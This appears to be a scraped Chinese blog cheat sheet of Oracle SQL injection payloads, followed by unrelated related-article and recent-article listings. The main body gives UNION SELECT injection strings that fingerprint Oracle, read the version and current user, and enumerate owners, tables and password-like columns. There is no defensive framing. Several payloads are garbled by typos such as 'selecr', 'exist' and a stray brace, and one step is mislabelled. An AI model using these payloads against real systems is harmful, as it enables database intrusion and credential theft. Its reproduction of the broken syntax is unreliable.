sql注入oracle

1. 判断为oracle

and exist (select * from dual ) 或者and (selecr count(*) from user_tables)>0 --

2. 获取基本信息

(1) 获取字段数

order by N

(2) 获取数据库版本

and 1=2 union select 1,2,(select banner from sys.v_$version where rownum =1),4,5 from dual


(3)获取数据库连接名

and 1=2 union select 1,2,{select sys_context('userenv','current_user') from dual),4 from dual


(4)获取日志文件的绝对路径

and 1=2 union select 1,2,(select instance_name from v$instance) from dual

3. 猜测数据库名/表和列名

(1)数据库名

and 1=2 union select (select owner from all_tables where rownum =1) from dual


(2)依次爆出数据库名

and 1=2 union select (select owner from all_tables where rownum =1 and owner<>'sys') from dual


(3)爆出表名

and 1=2 union select (select table_name from user_tables where rownum =1 ) from dualand (select column_name from user_tab_columns where column_name like '%25pass%25')>0and 1=2 union select (select column_name from user_tab_columns where columns_name like '%25pass%25') from dual


(4)爆出字段名

and 1=2 union select (select column_name from user_tab_columns where table_name = 'bonus' and rownum =1 )from dual


(注意:表名要大写)

sql注入oracle(1)相关推荐

  1. [网络安全提高篇] 一〇五.SQL注入之揭秘Oracle数据库注入漏洞和致命问题(联合Cream老师)

    当您阅读到该篇文章时,作者已经将"网络安全自学篇"设置成了收费专栏,首先说声抱歉.感谢这一年来大家的阅读和陪伴,这100篇安全文章记录了自己从菜鸡到菜鸟的成长史,该部分知识也花了很 ...

  2. [网络安全提高篇] 一〇四.网络渗透靶场Oracle+phpStudy本地搭建万字详解(SQL注入、XSS攻击、文件上传漏洞)

    当您阅读到该篇文章时,作者已经将"网络安全自学篇"设置成了收费专栏,首先说声抱歉.感谢这一年来大家的阅读和陪伴,这100篇安全文章记录了自己从菜鸡到菜鸟的成长史,该部分知识也花了很 ...

  3. Oracle学习总结(6)—— SQL注入技术

    不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动.在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞之一. SQL注入基 ...

  4. oracle延时盲注如何防止,【原创】WEB安全第四章SQL注入篇21 oracle 延时注入

    WEB安全第四章SQL注入篇21 oracle 延时注入 1.简介 DBMS_LOCK.SLEEP()函数可以让一个过程休眠很多秒,但使用该函数存在许多限制.首先,不能直接将该函数注入子查询中,因为O ...

  5. oracle防止sql注入proc,解密:Oracle怎么防SQL注入

    昨天我们说了怎么绕过waf进行sql注入,今天我们继续这个话题,说说Oracle数据库本身在防sql注入方面做了哪些工作. Oracle从8i开始PL/SQL中涌现出了大量SQL注入漏洞,直至11.2 ...

  6. oracle 注入靶场,pick靶场-sql注入

    甲.数字型注入 数字型注入一般提交值没有引号,所以直接在后面构造语句就可以了. 抓包查看 构造语句 提交后 该数据库表内容被爆出来了. 乙.字符型注入 首先我们要知道一点,字符串在数据库中提交是需要用 ...

  7. Oracle 存储过程 字符串拼接 SQL注入的问题

    之前项目中写的一个大的存储过程 中间用到的SQL字符串拼接的方法 来完成业务的流程 类似SQL的动态拼接把 为什么要有用到这种形式 因为我这个存储过程里面要处理 至少三个系统的六种情况 所以使用拼接的 ...

  8. 云端应用SQL注入攻击

    实验目的及要求: 完成VMware Workstations14平台安装,会应用相关操作: 完成Windows server2008R2操作系统及Kali Linux操作系统的安装: 掌握SQLmap ...

  9. dnslog 在 sql注入中的应用

    目录 1.DNSLOG的原理 2.Dnslog在常见数据库中SQL注入的实战 1.MySQL 2.msSQL 3.postgreSQL 4.Oracle 3.总结 1.DNSLOG的原理 DNS的解析 ...

最新文章

  1. 深度强化学习的前景:帮助机器掌控复杂性
  2. Spark源码阅读03-Spark存储原理之序列化和压缩
  3. scanf_s()函数 (是Microsoft公司VS开发工具提供的一个功能相同的安全标准输入函数)
  4. tensorflow tf.device() (返回指定要用于新创建的操作的默认设备的上下文管理器)
  5. 变换上三角矩阵_关于马尔可夫矩阵的一些个人研究成果、思考过程及相关解释...
  6. 【数据结构与算法】大根堆和优先队列的Java实现
  7. 庞伟(为奥运冠军名字作诗)
  8. cmd查看所有数据库 db2_db2 cmd命令操作
  9. MySQL之级联删除、级联更新、级联置空
  10. Oracle DB_LINK如何使用
  11. GitHub上10个有趣的开源小游戏(附加在线演示)
  12. Java调用网易163邮箱,发送邮件
  13. 程序员文档写作能力(三)-如何处理好微信、邮件、开会时的话术
  14. 一些Camera相关概念整理
  15. thinkphp使用dompdf导出pdf(html转pdf)
  16. 【机器学习实战笔记】Logistic回归
  17. 2017.11.06 ~ 11.10 NOIP八连测滚粗记
  18. 手机如何制作gif?简单三步在线合成gif动图
  19. switch基础用法
  20. thx是什么意思_thx什么意思?

热门文章

  1. 【推荐系统入门到项目实战】(五):SVD矩阵分解
  2. iOS11 适配遇到的坑
  3. 【openpyxl】安装openxlsx、打开和保存xlsx文件
  4. mysql添加int字段_mysql怎么增加int字段?
  5. D.Backspace
  6. HTML+CSS+JavaScript❤制作浪漫气球520告白相册❤
  7. 江苏交通学习网自动播放下一页
  8. 年货值得买手机排行:1500~4500元手机推荐来了
  9. Zookeeper 笔记
  10. python实现合并两个有序列表